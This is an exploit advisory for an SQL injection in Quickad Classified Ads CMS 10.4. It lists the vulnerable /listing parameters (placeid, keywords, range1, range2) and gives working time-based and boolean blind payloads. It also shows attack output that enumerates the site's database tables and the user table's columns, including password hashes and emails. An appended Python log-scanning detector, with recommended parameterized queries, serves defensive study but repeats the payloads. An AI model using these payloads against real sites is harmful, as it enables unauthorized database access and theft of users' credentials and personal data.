## https://sploitus.com/exploit?id=PACKETSTORM:172957
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                    C r a C k E r                                     ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
           ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author   : CraCkEr                                                                     :  
│ Website  : https://bylancer.com/                                                       │  
│ Vendor   : Bylancer                                                                    │  
│ Software : Quickad Classified Ads CMS 10.4                                             │  
│ Vuln Type: SQL Injection                                                               │  
│ Impact   : Database Access                                                             │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company's reputation.                                                      │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /listing  
  
https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=  
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]  
  
  
GET parameter 'range1' is vulnerable to SQL Injection  
  
---  
Parameter: range1 (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1  
---  
  
GET parameter 'range2' is vulnerable to SQL Injection  
  
---  
Parameter: range2 (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy  
---  
  
GET parameter 'placeid' is vulnerable to SQL Injection  
  
---  
Parameter: placeid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=  
---  
  
GET parameter 'keywords' is vulnerable to SQL Injection  
  
---  
Parameter: keywords (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1  
---  
  
  
[+] Starting the Attack  
  
fetching current database  
current database: 'classified_******'  
  
  
fetching tables  
  
[53 tables]  
+---------------------------+  
| ad_custom_fields |  
| ad_product |  
| pro_admins |  
| pro_adsense |  
| pro_balance |  
| pro_blog |  
| pro_blog_cat_relation |  
| pro_blog_categories |  
| pro_blog_comment |  
| pro_catagory_main |  
| pro_catagory_sub |  
| pro_category_translation |  
| pro_cities |  
| pro_countries |  
| pro_currencies |  
| pro_custom_data |  
| pro_custom_fields |  
| pro_custom_options |  
| pro_emailq |  
| pro_faq_entries |  
| pro_favads |  
| pro_firebase_device_token |  
| pro_languages |  
| pro_login_attempts |  
| pro_logs |  
| pro_messages |  
| pro_mobile_numbers |  
| pro_notification |  
| pro_options |  
| pro_pages |  
| pro_payments |  
| pro_plan_options |  
| pro_plans |  
| pro_product |  
| pro_product_resubmit |  
| pro_push_notification |  
| pro_qbm_banners |  
| pro_qbm_log |  
| pro_qbm_options |  
| pro_qbm_transactions |  
| pro_qbm_types |  
| pro_reviews |  
| pro_subadmin1 |  
| pro_subadmin2 |  
| pro_subscriptions |  
| pro_taxes |  
| pro_testimonials |  
| pro_time_zones |  
| pro_transaction |  
| pro_upgrades |  
| pro_user |  
| pro_user_options |  
| pro_usergroups |  
+---------------------------+  
  
  
fetching columns from Table 'pro_user'  
  
[36 columns]  
+----------------+----------------------------------------+  
| Column | Type |  
+----------------+----------------------------------------+  
| description | text |  
| name | varchar(225) |  
| status | enum('0','1','2') |  
| view | int(11) |  
| address | varchar(255) |  
| city | varchar(225) |  
| confirm | varchar(255) |  
| country | varchar(50) |  
| created_at | datetime |  
| email | varchar(255) |  
| facebook | varchar(255) |  
| forgot | varchar(255) |  
| googleplus | varchar(255) |  
| group_id | int(11) |  
| id | int(11) |  
| image | varchar(225) |  
| instagram | varchar(255) |  
| lastactive | datetime |  
| linkedin | varchar(255) |  
| notify | enum('0','1') |  
| notify_cat | varchar(255) |  
| oauth_link | varchar(255) |  
| oauth_provider | enum('','facebook','google','twitter') |  
| oauth_uid | varchar(100) |  
| online | enum('0','1') |  
| password_hash | varchar(255) |  
| phone | varchar(255) |  
| postcode | varchar(255) |  
| sex | enum('Male','Female','Other') |  
| tagline | varchar(255) |  
| twitter | varchar(255) |  
| updated_at | datetime |  
| user_type | enum('user','seller') |  
| username | varchar(255) |  
| website | varchar(255) |  
| youtube | varchar(255) |  
+----------------+----------------------------------------+  
  
  
[-] Done
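
Added example (not part of the original advisory or the vendor's code): a log-triage check for the four /listing parameters reported above, run over constructed access-log lines. It assumes placeid, range1 and range2 are numeric, based on the advisory's sample values; the function names and the log lines are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: these parameters are numeric, judging by the advisory's sample
# values (placeid=276781, range1=1, range2=1).
NUMERIC_PARAMS = {"placeid", "range1", "range2"}
NUMERIC_RE = re.compile(r"\d+(?:\.\d+)?")
# Constructs that appear in the advisory's payloads: SLEEP(), a sub-select,
# and a quote followed directly by a boolean operator.
SQL_MARKERS = re.compile(r"\bsleep\s*\(|\(\s*select\b|'\s*\)?\s*(?:and|or|xor)\b", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jun/2023:10:00:01 +0000] "GET /listing?keywords=car&location=Beirut&placetype=city&placeid=276781&cat=1&range1=100&range2=5000 HTTP/1.1" 200 18233',
    '203.0.113.9 - - [01/Jun/2023:10:00:05 +0000] "GET /listing?keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1%20AND%20(SELECT%203133%20FROM%20(SELECT(SLEEP(5)))crfu)&range2=1 HTTP/1.1" 200 18233',
    '203.0.113.9 - - [01/Jun/2023:10:00:12 +0000] "GET /listing?location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z&cat=1&subcat=1 HTTP/1.1" 200 18233',
    '203.0.113.9 - - [01/Jun/2023:10:00:20 +0000] "GET /listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=276781%27)%20AND%203510=3510%20AND%20(%27DiTr%27=%27DiTr&keywords=&cat=&subcat= HTTP/1.1" 200 18233',
]


def inspect_line(line):
    """Return [(parameter, reason), ...] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rstrip("/") != "/listing":
        return []
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and value and not NUMERIC_RE.fullmatch(value):
            hits.append((name, "non-numeric value"))
        elif SQL_MARKERS.search(value):
            hits.append((name, "SQL syntax in value"))
    return hits


def scan(lines):
    """Map line index -> findings for every line with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := inspect_line(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

The same type check belongs in the application as input validation, but the fix for the injection itself is binding all four values as query parameters instead of concatenating them into SQL.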